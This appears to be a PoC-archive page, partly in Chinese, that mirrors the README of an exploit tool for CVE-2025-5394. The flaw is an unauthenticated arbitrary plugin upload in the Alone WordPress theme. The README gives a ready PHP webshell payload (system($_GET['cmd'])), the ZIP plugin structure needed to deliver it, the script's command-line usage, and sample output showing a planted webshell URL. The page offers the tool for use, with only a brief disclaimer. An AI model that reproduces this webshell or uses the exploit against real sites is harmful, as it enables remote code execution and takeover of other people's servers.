关联漏洞
标题:
WordPress plugin Alone 安全漏洞
(CVE-2025-5394)
描述:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Alone 7.8.3及之前版本存在安全漏洞,该漏洞源于函数alone_import_pack_install_plugin缺少能力检查,可能导致任意文件上传。
描述
Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Missing Authorization to Unauthenticated Arbitrary File Upload via Plugin Installation
介绍
# 🚨 CVE-2025-5394 - Unauthenticated Arbitrary Plugin Upload in Alone Theme
## 📌 Affected Product:
**Alone – Charity Multipurpose Non-profit WordPress Theme**
**Versions:** <= 7.8.3
**CVE:** CVE-2025-5394
**CVSS Score:** 9.8 (Critical)
## 🔥 Vulnerability Summary:
The Alone theme for WordPress is vulnerable to **arbitrary file uploads** due to a **missing capability check** on the `alone_import_pack_install_plugin()` function.
This flaw allows **unauthenticated attackers** to **upload ZIP files** (disguised as plugins) from **remote locations**, potentially achieving **remote code execution**.
---
## ⚙️ Exploit Script (Python)
This repository contains a Python script that **automates the exploitation** of CVE-2025-5394.
The script triggers the vulnerable AJAX action and uploads a fake plugin (containing a webshell) directly to the WordPress server.
---
## 📁 Webshell Requirements:
The uploaded **ZIP file** must follow this structure:
```
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
```
Where:
- `shell_plugin` is the plugin directory.
- `shell_plugin.php` is a valid PHP plugin file **with a plugin header**.
- The PHP file can contain a webshell payload.
Example of minimal plugin header inside `shell_plugin.php`:
```php
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
```
---
## 🚀 Example Usage:
```bash
python3 CVE-2025-5394.py -help
```
```
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
```
---
## ✅ Successful Output:
```bash
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
```
---
## ⚠️ Disclaimer:
This script is provided **for educational and research purposes only**.
The author is **not responsible** for any misuse or illegal activity conducted using this code.
Use it **only on systems you own or have explicit permission to test**.
---
## 👨💻 By:
**Nxploited ( Khaled Alenazi )**
GitHub: [https://github.com/Nxploited](https://github.com/Nxploited)
文件快照
[4.0K] /data/pocs/706c95526fcf4b5ec3ab7909fa5d4f7b63d1c64a
├── [3.5K] CVE-2025-5394.py
├── [1.5K] LICENSE
├── [2.5K] README.md
└── [ 9] requirements.txt
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。